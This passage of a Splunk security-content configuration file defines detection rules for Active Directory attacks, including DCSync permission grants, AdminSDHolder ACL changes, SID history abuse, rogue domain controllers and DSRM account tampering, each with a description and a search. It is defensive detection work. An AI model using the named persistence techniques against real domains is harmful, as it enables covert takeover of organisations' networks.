action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Account Discovery With NetUser PreauthNotRequire - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-NetUser*" ScriptBlockText = "*-PreauthNotRequire*" | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_account_discovery_with_netuser_preauthnotrequire_filter` [ESCU - Windows AD Abnormal Object Access Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = Windows Active Directory contains numerous objects. A statistically significant increase in access to these objects may be evidence of attacker enumeration of Active Directory. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Windows Active Directory contains numerous objects. A statistically significant increase in access to these objects may be evidence of attacker enumeration of Active Directory. action.escu.how_to_implement = Enable Audit Directory Service Access via GPO and collect event code 4662. The required SACLs need to be created for the relevant objects. Be aware Splunk filters this event by default on the Windows TA. Recommend pre-filtering any known service accounts that frequently query AD to make detection more accurate. Setting wide search window of 48~72hr may smooth out misfires. action.escu.known_false_positives = Service accounts or applications that routinely query Active Directory for information. action.escu.creation_date = 2023-06-01 action.escu.modification_date = 2023-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Abnormal Object Access Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = The account $user$ accessed an abnormal amount ($ObjectName_count$) of [$ObjectType$] AD object(s) between $firstTime$ and $lastTime$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Abnormal Object Access Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4662 | stats min(_time) AS firstTime, max(_time) AS lastTime, dc(ObjectName) AS ObjectName_count, values(ObjectType) AS ObjectType, latest(Computer) AS dest count BY SubjectUserName | eventstats avg(ObjectName_count) AS average stdev(ObjectName_count) AS standarddev | eval limit = round((average+(standarddev*3)),0), user = SubjectUserName | where ObjectName_count > limit | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_ad_abnormal_object_access_activity_filter` [ESCU - Windows AD AdminSDHolder ACL Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the modification of the Access Control List for the AdminSDHolder object within a Windows domain. Specifically, the detection triggers on the addition of a new rule to the existing ACL. AdminSDHolder is an object located in the System Partition in Active Directory and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that dont match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. An adversary who has obtained privileged access to a Windows Domain may modify the AdminSDHolder ACL to establish persistence and allow an unprivileged user to take control of a domain. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the modification of the Access Control List for the AdminSDHolder object within a Windows domain. Specifically, the detection triggers on the addition of a new rule to the existing ACL. AdminSDHolder is an object located in the System Partition in Active Directory and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that dont match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. An adversary who has obtained privileged access to a Windows Domain may modify the AdminSDHolder ACL to establish persistence and allow an unprivileged user to take control of a domain. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for the AdminSDHolder object in order to log modifications. action.escu.known_false_positives = Adding new users or groups to the AdminSDHolder ACL is not usual. Filter as needed action.escu.creation_date = 2022-11-15 action.escu.modification_date = 2022-11-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD AdminSDHolder ACL Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = The AdminSDHolder domain object has been modified on $Computer$ by $SubjectUserName$ action.risk.param._risk = [{"risk_object_field": "SubjectUserName", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD AdminSDHolder ACL Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the modification of the Access Control List for the AdminSDHolder object within a Windows domain. Specifically, the detection triggers on the addition of a new rule to the existing ACL. AdminSDHolder is an object located in the System Partition in Active Directory and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that dont match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. An adversary who has obtained privileged access to a Windows Domain may modify the AdminSDHolder ACL to establish persistence and allow an unprivileged user to take control of a domain. action.notable.param.rule_title = Windows AD AdminSDHolder ACL Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=nTSecurityDescriptor OperationType="%%14674" ObjectDN="CN=AdminSDHolder,CN=System*" | rex field=AttributeValue max_match=10000 "A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;(?PS-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3})\)" | stats values(added_user_sid) by _time, Computer, SubjectUserName, ObjectDN | `windows_ad_adminsdholder_acl_modified_filter` [ESCU - Windows AD Cross Domain SID History Addition - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects within different domains. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries for inter-domain privilege escalation and persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects within different domains. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries for inter-domain privilege escalation and persistence. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcodes `4738` and `4742`. The Advanced Security Audit policy settings `Audit User Account Management` and `Audit Computer Account Management` within `Account Management` all need to be enabled. action.escu.known_false_positives = Domain mergers and migrations may generate large volumes of false positives for this analytic. action.escu.creation_date = 2022-11-17 action.escu.modification_date = 2022-11-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Cross Domain SID History Addition - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = Active Directory SID History Attribute was added to $user$ by $src_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Cross Domain SID History Addition - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects within different domains. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries for inter-domain privilege escalation and persistence. action.notable.param.rule_title = Windows AD Cross Domain SID History Addition action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` (EventCode=4742 OR EventCode=4738) NOT SidHistory IN ("%%1793", -) | rex field=SidHistory "(^%{|^)(?P.*)(\-|\\\)" | rex field=TargetSid "^(?P.*)(\-|\\\)" | where SidHistoryMatch!=TargetSidmatch AND SidHistoryMatch!=TargetDomainName | rename TargetSid as userSid | table _time action status host user userSid SidHistory Logon_ID src_user | `windows_ad_cross_domain_sid_history_addition_filter` [ESCU - Windows AD Domain Controller Audit Policy Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the disabling of audit policies on a domain controller. The detection is made by identifying changes made to audit policies and checks for the removal of success or failure auditing, which are common indicators of policy tampering. The detection is important because it indicates that an attacker has gained access to the domain controller and is attempting to evade detection and cover up malicious activity. The impact of such an attack can be severe, including data theft, privilege escalation, and compromise of the entire network. False positives might occur since legitimate changes to audit policies might also trigger the analytic. Upon triage, review the audit policy change event and investigate the source of the change. Additionally, you must capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the attack source." action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects the disabling of audit policies on a domain controller. The detection is made by identifying changes made to audit policies and checks for the removal of success or failure auditing, which are common indicators of policy tampering. The detection is important because it indicates that an attacker has gained access to the domain controller and is attempting to evade detection and cover up malicious activity. The impact of such an attack can be severe, including data theft, privilege escalation, and compromise of the entire network. False positives might occur since legitimate changes to audit policies might also trigger the analytic. Upon triage, review the audit policy change event and investigate the source of the change. Additionally, you must capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the attack source." action.escu.how_to_implement = Ensure you are ingesting EventCode `4719` from your domain controllers, the category domain_controller exists in assets and identities, and that assets and identities is enabled. If A&I is not configured, you will need to manually filter the results within the base search. action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-01-26 action.escu.modification_date = 2023-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Domain Controller Audit Policy Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = GPO $SubCategory$ of $Category$ was disabled on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Domain Controller Audit Policy Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the disabling of audit policies on a domain controller. The detection is made by identifying changes made to audit policies and checks for the removal of success or failure auditing, which are common indicators of policy tampering. The detection is important because it indicates that an attacker has gained access to the domain controller and is attempting to evade detection and cover up malicious activity. The impact of such an attack can be severe, including data theft, privilege escalation, and compromise of the entire network. False positives might occur since legitimate changes to audit policies might also trigger the analytic. Upon triage, review the audit policy change event and investigate the source of the change. Additionally, you must capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the attack source." action.notable.param.rule_title = Windows AD Domain Controller Audit Policy Disabled action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4719 (AuditPolicyChanges IN ("%%8448","%%8450","%%8448, %%8450") OR Changes IN ("Failure removed","Success removed","Success removed, Failure removed")) dest_category="domain_controller"| replace "%%8448" with "Success removed", "%%8450" with "Failure removed", "%%8448, %%8450" with "Success removed, Failure removed" in AuditPolicyChanges | eval AuditPolicyChanges=coalesce(AuditPolicyChanges,Changes), SubcategoryGuid=coalesce(SubcategoryGuid,Subcategory_GUID) | stats min(_time) as _time values(host) as dest by AuditPolicyChanges SubcategoryGuid | lookup advanced_audit_policy_guids GUID as SubcategoryGuid OUTPUT Category SubCategory | `windows_ad_domain_controller_audit_policy_disabled_filter` [ESCU - Windows AD Domain Controller Promotion - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a genuine DC promotion event. Identifying when a computer assigns itself the necessary SPNs to function as a domain controller. Note these events are triggered on the existing domain controllers, not the newly joined domain controller. This detection will serve to identify rogue DCs added to the network. There are 2x detections within this analytic story which identify DCShadow attacks, if you do not currently possess the logging for these detections, remove the where clause within this detection to identify DCShadow activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a genuine DC promotion event. Identifying when a computer assigns itself the necessary SPNs to function as a domain controller. Note these events are triggered on the existing domain controllers, not the newly joined domain controller. This detection will serve to identify rogue DCs added to the network. There are 2x detections within this analytic story which identify DCShadow attacks, if you do not currently possess the logging for these detections, remove the where clause within this detection to identify DCShadow activity. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `4742`. The Advanced Security Audit policy setting `Audit Computer Account Management` within `Account Management` needs to be enabled. action.escu.known_false_positives = None. action.escu.creation_date = 2023-01-26 action.escu.modification_date = 2023-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Domain Controller Promotion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = AD Domain Controller Promotion Event Detected for $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Domain Controller Promotion - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a genuine DC promotion event. Identifying when a computer assigns itself the necessary SPNs to function as a domain controller. Note these events are triggered on the existing domain controllers, not the newly joined domain controller. This detection will serve to identify rogue DCs added to the network. There are 2x detections within this analytic story which identify DCShadow attacks, if you do not currently possess the logging for these detections, remove the where clause within this detection to identify DCShadow activity. action.notable.param.rule_title = Windows AD Domain Controller Promotion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4742 ServicePrincipalNames IN ("*E3514235-4B06-11D1-AB04-00C04FC2DCD2/*","*GC/*")| stats min(_time) as _time latest(ServicePrincipalNames) as ServicePrincipalNames,values(signature) as signature, values(src_user) as src_user, values(user) as user by Logon_ID, dvc| where src_user=user| rename Logon_ID as TargetLogonId, user as dest | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$" | fields - dest, dvc, signature]| stats min(_time) as _time, values(TargetUserSid) as TargetUserSid, values(Target_Domain) as Target_Domain, values(user) as user, values(status) as status, values(src_category) as src_category, values(src_ip) as src_ip values(ServicePrincipalNames) as ServicePrincipalNames values(signature) as signature values(dest) as dest values(dvc) as dvc by TargetLogonId | eval dest=trim(dest,"$") | `windows_ad_domain_controller_promotion_filter` [ESCU - Windows AD Domain Replication ACL Addition - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the addition of the permissions necessary to perform a DCSync attack. In order to replicate AD objects, the initiating user or computer must have the following permissions on the domain. - DS-Replication-Get-Changes - DS-Replication-Get-Changes-All Certain Sync operations may require the additional permission of DS-Replication-Get-Changes-In-Filtered-Set. By default, adding DCSync permissions via the Powerview Add-ObjectACL operation adds all 3. This alert identifies where this trifecta has been met, and also where just the base level requirements have been met. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects the addition of the permissions necessary to perform a DCSync attack. In order to replicate AD objects, the initiating user or computer must have the following permissions on the domain. - DS-Replication-Get-Changes - DS-Replication-Get-Changes-All Certain Sync operations may require the additional permission of DS-Replication-Get-Changes-In-Filtered-Set. By default, adding DCSync permissions via the Powerview Add-ObjectACL operation adds all 3. This alert identifies where this trifecta has been met, and also where just the base level requirements have been met. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting the eventcode 5136. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled, alongside a SACL for `everybody` to `Write All Properties` applied to the domain root and all descendant objects. Once the necessary logging has been enabled, enumerate the domain policy to verify if existing accounts with access need to be whitelisted, or revoked. Assets and Identities is also leveraged to automatically translate the objectSid into username. Ensure your identities lookup is configured with the sAMAccountName and objectSid of all AD user and computer objects. action.escu.known_false_positives = When there is a change to nTSecurityDescriptor, Windows logs the entire ACL with the newly added components. If existing accounts are present with this permission, they will raise an alert each time the nTSecurityDescriptor is updated unless whitelisted. action.escu.creation_date = 2022-11-18 action.escu.modification_date = 2022-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Domain Replication ACL Addition - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = $src_user$ has granted $user$ permission to replicate AD objects action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Windows AD Domain Replication ACL Addition - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the addition of the permissions necessary to perform a DCSync attack. In order to replicate AD objects, the initiating user or computer must have the following permissions on the domain. - DS-Replication-Get-Changes - DS-Replication-Get-Changes-All Certain Sync operations may require the additional permission of DS-Replication-Get-Changes-In-Filtered-Set. By default, adding DCSync permissions via the Powerview Add-ObjectACL operation adds all 3. This alert identifies where this trifecta has been met, and also where just the base level requirements have been met. action.notable.param.rule_title = Windows AD Domain Replication ACL Addition action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` | rex field=AttributeValue max_match=10000 \"OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;(?PS-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3})\)\"| table _time dest src_user DSRGetChanges_user_sid DSRGetChangesAll_user_sid DSRGetChangesFiltered_user_sid| mvexpand DSRGetChanges_user_sid| eval minDCSyncPermissions=if(DSRGetChanges_user_sid=DSRGetChangesAll_user_sid,\"true\",\"false\"), fullSet=if(DSRGetChanges_user_sid=DSRGetChangesAll_user_sid AND DSRGetChanges_user_sid=DSRGetChangesFiltered_user_sid,\"true\",\"false\")| where minDCSyncPermissions=\"true\" | lookup identity_lookup_expanded objectSid as DSRGetChanges_user_sid OUTPUT sAMAccountName as user | rename DSRGetChanges_user_sid as userSid | stats min(_time) as _time values(user) as user by dest src_user userSid minDCSyncPermissions fullSet| `windows_ad_domain_replication_acl_addition_filter` [ESCU - Windows AD DSRM Account Changes - Rule] action.escu = 0 action.escu.enabled = 1 description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a Domain. A DC can be configured to allow the DSRM account to logon & be used in the same way as a local administrator account. This detection is looking for alterations to the behaviour of the account via registry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a Domain. A DC can be configured to allow the DSRM account to logon & be used in the same way as a local administrator account. This detection is looking for alterations to the behaviour of the account via registry. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Disaster recovery events. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD DSRM Account Changes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Windows Registry Abuse", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = DSRM Account Changes Initiated on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD DSRM Account Changes - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Windows Registry Abuse", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a Domain. A DC can be configured to allow the DSRM account to logon & be used in the same way as a local administrator account. This detection is looking for alterations to the behaviour of the account via registry. action.notable.param.rule_title = Windows AD DSRM Account Changes action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as _time from datamodel=Endpoint.Registry where Registry.registry_path= "*\\System\\CurrentControlSet\\Control\\Lsa\\DSRMAdminLogonBehavior" Registry.registry_value_data IN ("*1","*2") by Registry.action Registry.registry_path Registry.registry_value_data Registry.registry_value_type Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | join type=outer process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by Processes.user Processes.process_name Processes.process Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)`] | table _time action dest user parent_process_name parent_process process_name process process_guid registry_path registry_value_data registry_value_type | `windows_ad_dsrm_account_changes_filter` [ESCU - Windows AD DSRM Password Reset - Rule] action.escu = 0 action.escu.enabled = 1 description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a Domain. A DC can be configured to allow the DSRM account to logon & be used in the same way as a local administrator account. This detection is looking for any password reset attempts against that account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a Domain. A DC can be configured to allow the DSRM account to logon & be used in the same way as a local administrator account. This detection is looking for any password reset attempts against that account. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `4794` and have the Advanced Security Audit policy `Audit User Account Management` within `Account Management` enabled. action.escu.known_false_positives = Resetting the DSRM password for legitamate reasons, i.e. forgot the password. Disaster recovery. Deploying AD backdoor deliberately. action.escu.creation_date = 2022-09-08 action.escu.modification_date = 2022-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD DSRM Password Reset - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = DSRM Account Password was reset on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD DSRM Password Reset - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a Domain. A DC can be configured to allow the DSRM account to logon & be used in the same way as a local administrator account. This detection is looking for any password reset attempts against that account. action.notable.param.rule_title = Windows AD DSRM Password Reset action.notable.param.security_domain = endpoint action.notable.param.severity = high 